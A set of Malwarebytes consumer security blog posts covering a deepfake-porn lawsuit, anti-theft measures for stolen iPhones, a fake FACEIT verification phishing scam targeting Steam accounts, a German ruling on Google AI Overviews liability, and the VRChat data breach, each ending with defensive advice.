The websites named in that lawsuit often needed just one image of a person to generate fake pornography. And while nearly everyone has at least one image of themselves online, even if they had hundreds, the path towards deletion is somewhat understood—start by deactivating and deleting popular social media accounts. But for teenagers today, raised mostly online, and who share images directly with friends and boyfriends and girlfriends and exes, it’s likely impossible to remove every visual trace of themselves. Also, they shouldn’t have to face this problem alone.

The Lock and Code podcast frequently discusses structural problems that require individual management. You have to skirt corporate data collection. You have to find the automated license plate readers in your hometown. You have to review every single message you get with a certain antagonism, to guard yourself against scams.

So, it’s rare to encounter a solution that benefits more than one person.

Chiu serves as the City Attorney for San Francisco, which means his department can file a lawsuit on behalf of not just the people of San Francisco, but also California, and that’s what his team did in going after the deepfake websites.

Since then, Chiu’s department has shut down 10 deepfake nude websites, and it received a settlement agreement from a company called Briver LLC to no longer operate any website that creates nonconsensual deepfake pornography.

And, as California goes, so goes the nation.

In May of last year, the Take It Down Act became effective as law in the United States, which criminalizes “revenge porn” and AI-generated nonconsensual intimate imagery. The law is not perfect but so far it is being used as intended. Last month, two men in the US were among the first to be charged with violating the Take It Down Act for allegedly creating deepfake nudes that, according to the AP, “included both celebrities as well as private women, including recent high school graduates.”

Today, we revisit our conversation with San Francisco City Attorney David Chiu about the important fight against deepfake porn and the clear threat that his department found against the public.

“At least one of these websites specifically promotes the non-consensual nature of this. So, and I’ll just quote, ‘Imagine wasting time taking her out on dates when you can just use website X to get her nudes.'”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

Stolen iPhones could soon be worth a lot less to thieves

Malware Bytes Security - Fri, 06/12/2026 - 10:03am

The UK’s Metropolitan Police has reached an agreement with Apple designed to make stolen iPhones harder to resell and less attractive to thieves. The approach combines stronger technical protections with direct data sharing between Apple and law enforcement.

In 2023, about 1.4 million mobile phones were stolen in the US alone. London is reportedly one of the worst cities for phone theft, with around 200 devices stolen every day. 

As part of this effort, Apple has strengthened its Stolen Device Protection feature in iOS 26.4, making it harder for thieves to change security settings, factory‑reset a stolen iPhone, or set it up as new.

Previously, thieves with your passcode (or who snatched your iPhone while it was still unlocked) could factory reset it, wiping your account and making the device look new for resale. Stolen Device Protection blocks this, requiring biometric authentication, not just a passcode, to make critical changes.

The Met has started sharing identifiers for reported stolen devices with Apple. In return, Apple can provide data on whether those devices later attempt to reconnect to a network or attempt to be reactivated.

Police say this gives them a better picture of what happens to stolen devices: Are they being switched back on locally? Shipped abroad? Broken down for parts?

Met Police Commissioner Sir Mark Rowley said Apple believes it has “cracked” the engineering problem. Phone thefts in London have since fallen 18% year-on-year, with Westminster (the capital’s worst-affected borough) down 45.8%.

Given the early signs of success, the Met is pressing for broader changes.

The Commissioner has written to the Home Secretary asking for laws that would require all phone manufacturers and mobile operators to share information about stolen devices and implement measures that make stolen handsets unusable. 

As part of that effort, the Met has explicitly said that Samsung and Google are also improving device security to address phone theft, suggesting this will become an industry‑wide expectation rather than an Apple‑only initiative.

Possible pitfalls

From a privacy perspective, it’s important to keep an eye on what data is shared, and who can see it.

Reports so far suggest that Apple and the Met are exchanging device identifiers and high‑level information about whether a stolen phone has attempted to reconnect or be reactivated. In theory, that sounds narrow and purpose‑bound: device X was reported stolen, later tried to come online in country Y, at time Z. There is no public indication that content, contacts, or location histories are being handed over wholesale.

There’s also a risk of someone reporting your phone as stolen. If a device is incorrectly marked as stolen, the protections designed to stop thieves could lock an innocent user out, turning a valuable asset into a brick. Without transparent appeal mechanisms, this is a notable concern.

The measures could also create challenges for recycling initiatives, legitimate repair shops, and refurbishers. They may face additional hurdles when diagnosing, restoring, or reselling devices if anti-theft protections become more restrictive.

Stay safe

Make sure your phone is protected with a strong passcode and biometric security, such as Face ID or a fingerprint.

Enable Apple’s Find My feature, or the Android equivalent, and make sure it is linked to a strong account password.

Keep lock screen notifications to a minimum so thieves cannot quickly access your sensitive information if they get hold of your device.

When buying a used phone, use a reputable seller and make sure the device has been reset by its owner. Complete the initial setup process with the seller present to confirm the phone isn’t locked to someone else’s account or reported stolen.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

Fake verification pages are stealing Steam accounts from players

Malware Bytes Security - Fri, 06/12/2026 - 5:27am

Online gamers should watch out for a convincing scam that aims to steal your Steam account.

The scam uses fake FACEIT verification pages that look legitimate, complete with official branding, working links, and what appears to be a real Steam login window. By the time it asks for your password, many victims are convinced they’re interacting with a genuine service.

The goal is to steal your Steam account.

Why this scam targets FACEIT players

If you’re not a competitive gamer, FACEIT might not mean anything to you. But to millions of people, it’s a big deal, and that makes it a target for impersonation by cybercriminals.

FACEIT is one of the largest competitive gaming platforms for Counter-Strike 2 (CS2). Millions of players use it for ranked matches, tournaments, leagues, and advanced anti-cheat protections.

To use FACEIT, players typically connect their Steam platform accounts, which are valuable for scammers.

A stolen Steam account can contain:

  • Hundreds or thousands of dollars’ worth of purchased games
  • Valuable CS2 skins and items, some worth significant amounts of real money
  • Wallet funds and saved payment methods
  • Years of friends, messages, and community reputation

Once criminals gain access, they can steal items, scam friends, or sell the account on criminal marketplaces.

Because FACEIT connects to Steam, a fake “FACEIT verification” page is an easy way to trick people. Victims think they’re updating their account, but attackers are really trying to steal Steam accounts that may contain valuable games, skins, and wallet funds. Gamers are especially vulnerable because they’re used to linking accounts and following verification steps, and may act quickly if they think their access to a game is at risk.

How the scam works

The attack starts with a website that looks like an official FACEIT page. The scam pages are likely distributed through the same channels gamers use every day: community forums, chat servers, social media posts, and direct messages.

The page claims FACEIT is offering free, optional identity verification to help build a more trusted community. It’s polished, uses the correct branding, and even includes working links to FACEIT’s real blog and support pages. Everything about it is designed to make you think you’re on a genuine FACEIT website, but you’re not.

Fake FACEIT verification page

Instead of using the official faceit.com domain, the scammers use lookalike addresses such as:

  • faceit-discord.com
  • faceit-clubs-verify.com
  • faceit-verification-clubs.com

Extra words like “verification” or “discord” are designed to make these addresses look legitimate at a glance, but the sites are controlled by cybercriminals.

Many of these domains are only days or even hours old. Scammers constantly register new ones, knowing they’ll likely be blocked eventually. That’s why a site not being flagged as dangerous doesn’t mean it’s safe.

There are small clues, though. In one example, the page listed both “Copyright 2024” and “Copyright 2025.” Legitimate companies rarely make mistakes like that, but scam sites often do.

After the verification pitch, the page claims there’s a problem with your CS2 account and asks you to update your information to prove you’re not a cheater or using a smurf account.

Here’s the clever part. The page offers a QR code to scan, but the code appears blurry and difficult to scan. Researchers believe that’s intentional. After a few failed attempts, many users are likely to give up and click the easier-looking “Sign in through Steam” button instead.

The broken QR code is the nudge that guides victims toward the part of the page where the real theft happens.

Fake FACEIT page with a blurry QR code and “Sign in with Steam” button

When users eventually give up on the QR code and click the button, a Steam login window appears. It looks convincing, complete with the Steam logo, login fields, and what appears to be a steamcommunity.com address bar.

But the window is fake.

Fake Steam sign-in window steals your account details

Instead of opening a real Steam login page, the scammers display a convincing copy inside the website itself. Security researchers call this a Browser-in-the-Browser attack. The fake window looks and behaves like a genuine browser pop-up, but the address bar is just part of the image.

Anything entered into the form goes straight to the criminals. If the page also asks for a Steam Guard code, that gets stolen too, allowing attackers to access the account. Some victims are then tricked into “protecting” their items by transferring them to a friend or backup account, when they’re actually sending them directly to the scammers.

How to protect yourself against this scam

A few simple habits can stop this scam:

  • Check the real address bar. FACEIT’s official website is faceit.com. Be wary of lookalike domains such as faceit-discord.com or faceit-clubs-verify.com. Remember: a login window inside a webpage can fake its own address bar. Trust the one at the top of your browser, not the one inside the page.
  • Be suspicious of blurry QR codes. Researchers believe the QR code in this scam is deliberately blurred to push users toward the “Sign in through Steam” button instead.
  • Treat urgency as a warning sign. Messages about account problems, verification, or losing access are designed to make you act quickly. Slow down and verify first.
  • Go to the source. If you’re unsure whether FACEIT or Steam needs something from you, open the official website or app yourself rather than following links from Discord, messages, or ads.
  • Add another layer of protection. Scam sites often look legitimate. Malwarebytes Browser Guard can help block known phishing pages and other online scams before you enter your username and password.

If you already entered your details

Change your Steam password immediately, make sure Steam Guard is enabled, and sign out of all other devices. Check your Steam API key settings and remove any key you don’t recognize. Change the password anywhere else you reused it and review your account for unauthorized trades or purchases.

Why this scam works

This scam works because it doesn’t look like a scam. The branding is convincing, the story makes sense, and even the Steam login window appears legitimate.

Most people know to check the address bar before entering a password. Browser-in-the-Browser attacks are designed to defeat that habit. Because the fake Steam window is built into the page itself, the criminals can make its address bar say whatever they want, including steamcommunity.com.

The safest approach is to be suspicious of any login window that appears inside another website. If you’re unsure, close the page and sign in to Steam the way you normally would, through the official app or by typing the address yourself.

That small pause, that refusal to take the convenient shortcut a page is pushing you toward, is all it takes to keep your account yours.

Google can be liable for false AI Overviews, court rules

Malware Bytes Security - Thu, 06/11/2026 - 12:09pm

A German court has ruled that Google can be held directly responsible for defamatory claims produced by its AI Overviews. Basically, the court said that telling people they should double-check AI search results is not enough to deny liability for what those results say.

This kind of warning may not be enough

The Munich Regional Court issued a preliminary injunction against Google after two German publishers discovered that AI Overviews falsely portrayed them as involved in scams and “dubious business practices,” even though the linked articles did not support those claims.

The decision could echo far beyond Germany. The court effectively found that Google can be held directly liable for defamatory content generated by its AI Overviews. The court cut through the usual “it’s just AI, don’t trust it too much” messaging and made one thing clear: If you build a system that confidently smears people or companies, you may be responsible for what it says, even when the content was “hallucinated” by AI.

AI Overviews are not harmless suggestions. In this case, the court treated them as Google’s own statements, with all the legal baggage that comes with that.

When the publishers sent a cease-and-desist letter, Google did not promptly stop similar claims from appearing. That detail turned out to be crucial in the ruling. The court noted that, unlike traditional search results, which simply list third-party content, AI Overviews generate “independent, new, and substantive statements.”

And since only Google can adjust the models and the logic that create those statements, only Google can reliably stop the system from repeating the same or similar falsehoods. In this case, the court found that Google can be held responsible.

For years, search engines have enjoyed broad protection under the logic that some harmful content is unavoidable when indexing the open web at scale. Showing a search result does not mean endorsing it. The search engine is a channel, not a publisher.

That changes when an AI Overview summarizes, rephrases, and sometimes invents facts, then publishes them at the top of search results.

AI Overviews are an extra feature, not essential to how search works. However, the appeal of AI summaries is their fast, confident answers, which is exactly what makes them dangerous. When those answers are wrong, many users may not click through to check the sources.

The ruling is preliminary and may be appealed, but the signal is clear: AI search output is not magic dust that makes liability disappear. Disclaimers about possible mistakes may not be enough when a system is deployed at scale, creates new content, and is designed to be trusted.

By the numbers

Google AI Overviews are powered by Gemini, Google’s AI model. Like other AI systems, it can produce confident answers that are wrong or poorly supported.

Pew Research studied browsing data from hundreds of users and found that when an AI Overview appears on a Google results page, clicks to traditional search results drop from around 15% to about 8%. 

A New York Times analysis of AI Overviews found that they were accurate roughly nine out of ten times. But with Google processing more than five trillion searches a year, even a small error rate could mean millions of wrong answers.

And those mistakes are not always due to bad sources. Even when Google links to a page with the correct information, its AI can still produce a false answer. More than half of the accurate responses were classified as “ungrounded,” meaning the websites cited by the AI Overview did not fully support the information it provided.

The main lesson here is to double-check AI search responses. Don’t trust an answer just because it’s presented confidently and includes links.

Users can be steered toward real threats, or away from effective protections, simply because an AI system sounded convincing on a search page.

If you find false or defamatory AI summaries about yourself or your company, document them thoroughly. Take screenshots, save the search terms, file correction requests, and keep records of the platform’s response. Or the lack of one.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

Data of 2.4 million VRChat users stolen

Malware Bytes Security - Thu, 06/11/2026 - 7:31am

VRChat, Inc. has filed a data breach notice revealing that the information of more than 2.4 million users was involved in a data breach.

According to the notice, VRChat experienced unauthorized access to some account data between May 10 and May 12, 2026. The access happened in VRChat’s cloud environment and involved user profile and login-related data.

The information exposed varied by account, but may have included:

  • VRChat username
  • Email address associated with the VRChat account
  • VRChat+ subscription status
  • Login history, including device information, hardware identifiers, and IP addresses

VRChat explicitly states that passwords, credit card numbers or other payment information, and government ID documents used for age verification were not compromised.

VRChat is a social platform designed primarily for virtual reality headsets, allowing users to interact with others through user-created 3D avatars and worlds. Users can access VRChat through Steam for PC, the Meta Quest Store, or as an Android app for compatible devices.

With no passwords or payment card data exposed, direct card fraud or immediate takeover of payment methods via this breach alone is unlikely. But even without passwords or card data, the combination of identifiers, emails, and IP/device data creates several risks for affected users.

Potential risks

Phishing

Cybercriminals may use VRChat usernames and email addresses in targeted phishing attempts. For example, users may receive phishing emails or in‑platform messages claiming to be from “VRChat Support,” with fake security alerts or prompts to “confirm your age verification” via a malicious link.

Knowledge of VRChat+ subscription status could make scams more convincing. A scammer could send tailored lures like “billing issue with your VRChat+ subscription” or refund scams, which tend to have higher click-through rates among paying users.

Account take-over

Cybercriminals may combine usernames and email addresses from this breach with passwords stolen in other data breaches and try them against VRChat accounts. This technique, known as credential stuffing, takes advantage of people who reuse passwords across multiple sites.

Valuable accounts may then be sold to other players or used for scams.

Identity correlation

Steam and Meta user IDs linked to VRChat accounts can help cybercriminals connect identities across gaming and social platforms, especially if the same email or profile name is reused.

IP addresses, login history, device information, and other identifiers can also help build a more detailed advertising or tracking profile of a user.

How to stay safe

VRChat says it has implemented additional security controls and engaged professionals to monitor for further threats. If you were affected by the breach, here are some steps you can take to protect yourself:

First and foremost, be cautious of emails, texts, or calls claiming to come from VRChat or the gaming platforms you used it on, as cybercriminals often exploit breaches with phishing scams.

If you’ve used your VRChat password anywhere else, change those accounts immediately, and set up two-factor authentication (2FA) on your VRChat account if you haven’t already.

More general advice can be found in our article on what to do when you find out you’re involved in a data breach.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 
